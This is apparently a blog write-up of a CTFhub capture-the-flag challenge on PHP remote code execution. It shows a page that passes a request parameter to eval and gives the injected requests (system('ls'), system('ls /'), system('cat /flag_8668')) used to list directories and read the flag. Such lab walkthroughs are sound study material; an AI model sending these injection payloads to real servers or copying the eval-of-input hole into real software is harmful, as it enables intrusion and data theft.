CTFhub-RCE-evel执行

携柺星年2023-11-13 11:42

访问目标地址:

<?php

if (isset($_REQUEST['cmd'])) {

eval($_REQUEST["cmd"]);

} else {

highlight_file(FILE);

}

?>

根据PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");
!切记最后的分号不可省略!

没有需要的文件

看看上一级的文件夹 /?cmd=system("ls /");
!切记最后的分号不可省略!

打开flag文件发现FLAG /?cmd=system("cat /flag_8668");
!切记最后的分号不可省略!

相关推荐
大鹏说大话12 小时前
Windows 下将 Java 项目打包为 Docker 容器并部署的完整指南
java·windows·docker
陆枫Larry12 小时前
uni-swipe-action 从编辑页返回后滑动按钮仍显示的问题
前端
大时光12 小时前
gsap 配置解读 --4
前端
Zachery Pole12 小时前
JAVA_03_运算符
java·开发语言·前端
Lyda12 小时前
i18n Ally Next:重新定义 VS Code 国际化开发体验
前端·javascript·后端
张万森爱喝可乐12 小时前
Java 8 新特性探秘:开启现代Java开发之旅
java
xiao阿娜的妙妙屋112 小时前
Seedance2.0在哪可以用?自媒体人狂喜!这款AI视频神器我吹爆了
前端
橙序员小站12 小时前
程序员如何做好年夜饭:用系统设计思维搞定一桌硬菜
前端·后端
瞌睡不醒12 小时前
在行情面板中加入 K 线:一次结构升级的实现过程
前端
热门推荐
01GitHub 镜像站点02PHP Error: 常见错误及其解决方法03Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services04HTB 赛季10 - Pterodactyl - user05爬虫逆向之观安(观镜WEB应用安全防护系统)06UV安装并设置国内源07openClaw安装飞书插件|核心踩坑:spawn EINVAL 错误终极解决指南08243 行 microGPT:把“训练 + 推理”拆到骨头里09BongoCat - 跨平台键盘猫动画工具10[拆解LangChain执行引擎] Channel——驱动Node执行的原力